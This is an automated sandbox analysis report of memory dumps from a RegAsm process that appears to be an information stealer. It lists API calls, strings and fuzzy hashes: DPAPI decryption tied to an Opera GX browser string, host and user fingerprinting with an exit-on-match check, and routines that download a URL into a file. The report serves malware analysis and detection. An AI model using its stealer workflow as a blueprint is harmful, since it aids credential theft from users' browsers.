Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 512175977-1819349886
Opcode ID: 228dde18d6380654e1e01747a0d40dda2febb3b458d53894edb870cd61412a9d
Instruction ID: 04e0419f88c9d5c658d70bb4a20b994614d1a13e8e8d8d930ac63f7b7d88e2a3
Opcode Fuzzy Hash: 228dde18d6380654e1e01747a0d40dda2febb3b458d53894edb870cd61412a9d
Instruction Fuzzy Hash: 3E3193B1D001099BCB10DF95DC42FEFB779AB84318F14422AE915B32C2EA395A49C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 00410530 Relevance: 6.0, APIs: 4, Instructions: 39memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410545
HeapAlloc.KERNEL32(00000000), ref: 0041054C
RegOpenKeyExA.KERNEL32(80000002,0145A738,00000000,00020119,00000000), ref: 0041056B
RegQueryValueExA.KERNEL32(00000000,014617D8,00000000,00000000,00000000,000000FF), ref: 00410586

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: ebbb83980b96e7640f25af26754c2ff0e91fd82364fa7b8dbd91e5869d307b29
Instruction ID: 6759878f835c56c9ca0f427d276befcc344c5531ee7d20c41334848b2fd0dccc
Opcode Fuzzy Hash: ebbb83980b96e7640f25af26754c2ff0e91fd82364fa7b8dbd91e5869d307b29
Instruction Fuzzy Hash: 0CF04FB9640209BFD714DBA0DC59FAB7BBEEB45B41F105159BA0597250D6709900CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0040E510 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 488COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(00000000,Opera GX,00427AE6,00427AE3,?,?), ref: 0040E56D

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Part of subcall function 0040CF50: StrStrA.SHLWAPI(00000000,01462058,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB
Part of subcall function 0040CF50: memcmp.MSVCRT ref: 0040CFF9

Strings

Opera GX, xrefs: 0040E556
$, xrefs: 0040EB1E

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
String ID: $$Opera GX
API String ID: 1439182418-3699434461
Opcode ID: 1749706aa2db81fa6de757973773e7b7360e6dd657e733d53bc66fe27f04b27c
Instruction ID: 17207a86614afdb77cff5a3d56c68c7749fc063a50330c9fb849252114e4ac69
Opcode Fuzzy Hash: 1749706aa2db81fa6de757973773e7b7360e6dd657e733d53bc66fe27f04b27c
Instruction Fuzzy Hash: 99128F71911248EACB14EBE5C945BEDBBB8AF19304F14817EF90573286DB781B0CC7A6

Uniqueness

Uniqueness Score: -1.00%

Function 004140D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 00414100
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004141CF

Strings

ERROR, xrefs: 004141C9

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: ERROR
API String ID: 1659193697-2861137601
Opcode ID: df3b25b72e81ea361da62db3694fc4a8dabbd1a4e0db10303024cbd4f1e4006f
Instruction ID: 7a4a8b2ae2701fe1ed20729628e627548499ab356697860d70efb29cd96e5671
Opcode Fuzzy Hash: df3b25b72e81ea361da62db3694fc4a8dabbd1a4e0db10303024cbd4f1e4006f
Instruction Fuzzy Hash: 8341B6B1900244FFCB00EFA9D846BDE7BB4AB19354F10812EF505A7281DB389648CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00413D40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405A30: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
Part of subcall function 00405A30: StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000004), ref: 00405AC0
Part of subcall function 00405A30: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
Part of subcall function 00405A30: HttpOpenRequestA.WININET(00000000,GET,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405B1B
Part of subcall function 00405A30: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F

StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042248F), ref: 00413DB5

Strings

ERROR, xrefs: 00413DA3
ERROR, xrefs: 00413E0E

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
String ID: ERROR$ERROR
API String ID: 1815705353-2579291623
Opcode ID: 60aaeff547289181ae8f8bb4519d178c4f6478f03eee4e5f3c1696f8079ee93f
Instruction ID: 2de14b8495628cd286d50378bf444954eaaf3636dd8b2d3ca14243e0d5a7f802
Opcode Fuzzy Hash: 60aaeff547289181ae8f8bb4519d178c4f6478f03eee4e5f3c1696f8079ee93f
Instruction Fuzzy Hash: 99414F30914289DADB10EBA5C5057DDBBE8AF19308F5041AEF905636C2DFB81B08C7F6

Uniqueness

Uniqueness Score: -1.00%

Function 00411A40 Relevance: 4.5, APIs: 3, Instructions: 31COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411A5C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411A77
CloseHandle.KERNEL32(00000000), ref: 00411A7E

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 4989c77146abbc5ee76c948889740fc30d2da5c3921abf62d6455a5f4ed49132
Instruction ID: 660ba3e5b87f2d6f46484b434598976fca83c63f4e6e6eb2b951d01fded5b4af
Opcode Fuzzy Hash: 4989c77146abbc5ee76c948889740fc30d2da5c3921abf62d6455a5f4ed49132
Instruction Fuzzy Hash: AAF0273560112867D720AB44CC05FDE77689F05700F000194FF48AB2D0DBB05EC487D4

Uniqueness

Uniqueness Score: -1.00%

Function 004102C0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,014532B8,0041887F), ref: 004102CC
HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,014532B8,0041887F), ref: 004102D3
GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 00f558dfb3a4b80afd8e40931e88319d94c69cb643d845e7bfdafbd5d6e961f5
Instruction ID: 406b522a559848795045bf452203491930279dbdd2025bb65e998ac759834946
Opcode Fuzzy Hash: 00f558dfb3a4b80afd8e40931e88319d94c69cb643d845e7bfdafbd5d6e961f5
Instruction Fuzzy Hash: 68E08CB5741229ABD3109BE9AC0DBDBBAEDDB06B51F501196BB04D3240EAF08D0087E8

Uniqueness

Uniqueness Score: -1.00%

Function 00401050 Relevance: 4.5, APIs: 3, Instructions: 19stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,014532B8,0041887F), ref: 004102CC
Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,014532B8,0041887F), ref: 004102D3
Part of subcall function 004102C0: GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

strcmp.MSVCRT ref: 0040105C

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 00410293
Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,014532E8), ref: 004102A7

strcmp.MSVCRT ref: 00401075
ExitProcess.KERNEL32 ref: 00401082

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
String ID:
API String ID: 2098570390-0
Opcode ID: 62a4c53fcb9bf593e476f24c714467af4436e90a2949d6c67d663f3053a85b1f
Instruction ID: 0e87048c4c810025046b2ff71762e49e4161a917b2b12ba1ada2c112072a28c4
Opcode Fuzzy Hash: 62a4c53fcb9bf593e476f24c714467af4436e90a2949d6c67d663f3053a85b1f
Instruction Fuzzy Hash: 5ED05BB1D0020256CF1077725D59A57229D9E11316740052FF840D7151F53DDCC4C27D

Uniqueness

Uniqueness Score: -1.00%

Function 00412A70 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 728COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,01461F20,?,00428574,?,?,00000000,01462100,00000000,?,01461618,?,00428570), ref: 004131EA

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405850: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004058B5

Part of subcall function 00405850: StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,0000000D), ref: 004058ED
Part of subcall function 00405850: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405912
Part of subcall function 00405850: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000D), ref: 00405935
Part of subcall function 00405850: InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 0040594E
Part of subcall function 00405850: WriteFile.KERNEL32(00000000,?,000000FF,004203D8,00000000,?,?,?,?,?,?,0000000D), ref: 0040596E
Part of subcall function 00405850: InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405998
Part of subcall function 00405850: CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000D), ref: 004059B4
Part of subcall function 00405850: InternetCloseHandle.WININET(00000000), ref: 004059BB
Part of subcall function 00405850: InternetCloseHandle.WININET(00000000), ref: 004059C2

Strings

F, xrefs: 00413482

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$File$CloseHandle$CreateOpenReadlstrcat$DirectoryWritelstrlen
String ID: F
API String ID: 3336520604-1304234792
Opcode ID: 64933d0dfc4c3c513359294a403d82db5c53117708ef4ed9c4664b0891a92b25
Instruction ID: c04eb2c2e67ebdd07284bf2178d9f41eb0a15058c49e10529a03e517fbc21d46
Opcode Fuzzy Hash: 64933d0dfc4c3c513359294a403d82db5c53117708ef4ed9c4664b0891a92b25
Instruction Fuzzy Hash: F6626D70805288EACB15E7E5C951BDDBBB85F19308F1480AEE54573282DF781B4CCBBA

Uniqueness

Uniqueness Score: -1.00%

Function 004069E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,6k@,?,?,?,?,00406B36), ref: 00406A55

Strings

6k@, xrefs: 00406A3F, 00406A42

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: 6k@
API String ID: 544645111-796046284
Opcode ID: 3cd70f51d592b6cc45cf5fa41d2a0a34811b31e58a1e5b5358e74f1d35610851
Instruction ID: 3aa464cb03e6a5daef80767049aabb5e2f81a0e8360af49d45380e9ae7790c68
Opcode Fuzzy Hash: 3cd70f51d592b6cc45cf5fa41d2a0a34811b31e58a1e5b5358e74f1d35610851
Instruction Fuzzy Hash: D211C6717141149FD724EF5CD8807A5F3D5FB0A300F51853AF94AE7280D639AC619B99

Uniqueness

Uniqueness Score: -1.00%

Function 004116F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

?{B, xrefs: 00411717, 00411725

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID: ?{B
API String ID: 1699248803-2221931326
Opcode ID: e79796351f89c84eeedae8a54d9f090e4875ca2003630773c6d08024e9c7cace
Instruction ID: a4db74e52ac5736c466cc754061609f1f71d2f4092c2171fd08521da563084ac
Opcode Fuzzy Hash: e79796351f89c84eeedae8a54d9f090e4875ca2003630773c6d08024e9c7cace
Instruction Fuzzy Hash: F7F08231A1015CABDB10DB58DC51B9EB7FDDB44715F1042A6B908A32C0D6706F0A8B94

Uniqueness

Uniqueness Score: -1.00%

Function 00411690 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Strings

J@, xrefs: 004116AB, 004116CB

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: J@
API String ID: 3188754299-3016281811
Opcode ID: d8f784d34889ff53bad89def2e75e44130d81317278a711d09a1317144491cd1
Instruction ID: cb1ed88cae5c2bc93b3530c0dbec5c822ac86073251ab52e185eaeaf3754e9f1
Opcode Fuzzy Hash: d8f784d34889ff53bad89def2e75e44130d81317278a711d09a1317144491cd1
Instruction Fuzzy Hash: 57F08271904658ABCB10DF58D901B99B768EB09B34F20476AFC35937D0C73D5A4086C4

Uniqueness

Uniqueness Score: -1.00%

Function 00410D30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

Unknown, xrefs: 00410D64

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProfilelstrcpy
String ID: Unknown
API String ID: 2831436455-1654365787
Opcode ID: 19b3602f314757e0faabd27852db01908b64834fb2260b4e9b2713c893113fbd
Instruction ID: bd33c02f77d4a78c5fd75930b30a6426299f1aaef28d0e4199fa1c9ffb468557
Opcode Fuzzy Hash: 19b3602f314757e0faabd27852db01908b64834fb2260b4e9b2713c893113fbd
Instruction Fuzzy Hash: 95E09232B0112857CB20AA98EC017EEB3ADDB48615F40017EFD0CD3281DE64591987D9

Uniqueness

Uniqueness Score: -1.00%

Function 19C70531 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

failed memory resize %u to %u bytes, xrefs: 19C70558

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
